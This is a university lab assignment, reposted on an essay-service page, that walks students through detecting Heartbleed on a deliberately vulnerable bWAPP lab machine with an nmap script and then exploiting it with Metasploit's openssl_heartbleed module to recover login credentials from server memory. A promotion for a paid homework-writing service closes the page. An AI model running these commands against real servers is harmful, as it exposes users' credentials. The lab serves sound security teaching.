10 Dec Weekly Learning and Reflection? In two to three paragraphs (i.e., sentences, not bullet lists) using APA style citations if needed, summarize, and interact with the content covered in this la
Weekly Learning and Reflection
In two to three paragraphs (i.e., sentences, not bullet lists) using APA style citations if needed, summarize, and interact with the content covered in this lab. Summarize what you did as an attacker, what kind of vulnerabilities did you exploit, what might have prevented these attacks. Mention the attackers and all of the targets in your summary. You can provide topologies, sketches, graphics if you want. In particular, highlight what surprised, enlightened, or otherwise engaged you. You should think and write critically, not just about what was presented but also what you have learned through the session. You can ask questions for the things you're confused about. Questions asked here will be summarized and answered anonymously in the next class.
Lab-11: Exploiting Heartbleed Vulnerability
In this lab, you will launch a Nmap script scan against the bWAPP machine and exploit the Heartbleed vulnerability using the Metasploit Framework. bWAPP stands for buggy web application. Like OWASP BWA, bWAPP is a deliberately insecure web application hosting more than 100 web vulnerabilities. Heartbleed is not a classical web application vulnerability (like XSS, SQLi, or CSRF); instead it is a vulnerability discovered in one of the famous cryptographic libraries. What brings Heartbleed to the bWAPP machine is that it affects SSL protocol; therefore, any web application "secured" by this SSL.
Section-1: Detect Heartbleed Vulnerability by Using Nmap Script Scan
In this section, you will launch a Nmap script scan against the bWAPP machine.
1) Enter the Netlab environment
2) Open Kali Linux machine
3) Open a terminal window by clicking the terminal icon on the bottom menu
4) Type nmap 192.168.2.16 –script ssl-heartbleed -n to check whether the remote machine has Heartbleed vulnerability. (This command will take 2-3 minutes to show the results)
Heartbleed is a very critical vulnerability in the OpenSSL cryptographic software library. Note that the Nmap script found the vulnerability on port 8443. bWAPP is hosting a web application on this port. You will revisit this port in the next section.
Take a screenshot of the terminal windows showing the vulnerability on port 8443.
Section-2: Exploit Heartbleed Vulnerability by Using Metasploit
In this section, you will exploit the heartbleed vulnerability you discovered in the Section-1. You will use the Metasploit Framework's openssl_heartbleed module to exploit the vulnerability.
1) In the terminal window, type msfconsole to enter Metasploit
2) Type use auxiliary/scanner/ssl/openssl_heartbleed
3) Type show options
4) Type set rhosts 192.168.2.16
5) Type set rport 8443
6) Type set verbose true
7) Now, open a Firefox window and go to https://192.168.2.16:8443
Don’t forget to add https prefix
Ignore security warnings that will be shown by Firefox browser by clicking Advanced and “Accept the Risk and Continue” buttons
8) Click in the first link named bWAPP
9) Type in bee to the Login box and bug to the Password box and press enter or click on the Login button
10) Switch back to the terminal window and type run and press enter so that that exploit will run against the SSL protocol configured on the bWAPP application
Note that you provided your username and password to an https website; it is supposed to have your username “bee” and password “bug” encrypted by SSL protocol.
Metasploit will generate a long result screen showing the applied steps and results. Look closely at the beginning part of the results and spot the username and password in cleartext. Take a screenshot of the part of the result screen showing the username and password in cleartext.
Weekly Learning and Reflection
In two to three paragraphs (i.e., sentences, not bullet lists) using APA style citations if needed, summarize, and interact with the content covered in this lab. Summarize what you did as an attacker, what kind of vulnerabilities did you exploit, what might have prevented these attacks. Mention the attackers and all of the targets in your summary. You can provide topologies, sketches, graphics if you want. In particular, highlight what surprised, enlightened, or otherwise engaged you. You should think and write critically, not just about what was presented but also what you have learned through the session. You can ask questions for the things you're confused about. Questions asked here will be summarized and answered anonymously in the next class.
Our website has a team of professional writers who can help you write any of your homework. They will write your papers from scratch. We also have a team of editors just to make sure all papers are of HIGH QUALITY & PLAGIARISM FREE. To make an Order you only need to click Ask A Question and we will direct you to our Order Page at WriteDemy. Then fill Our Order Form with all your assignment instructions. Select your deadline and pay for your paper. You will get it few hours before your set deadline.
Fill in all the assignment paper details that are required in the order form with the standard information being the page count, deadline, academic level and type of paper. It is advisable to have this information at hand so that you can quickly fill in the necessary information needed in the form for the essay writer to be immediately assigned to your writing project. Make payment for the custom essay order to enable us to assign a suitable writer to your order. Payments are made through Paypal on a secured billing page. Finally, sit back and relax.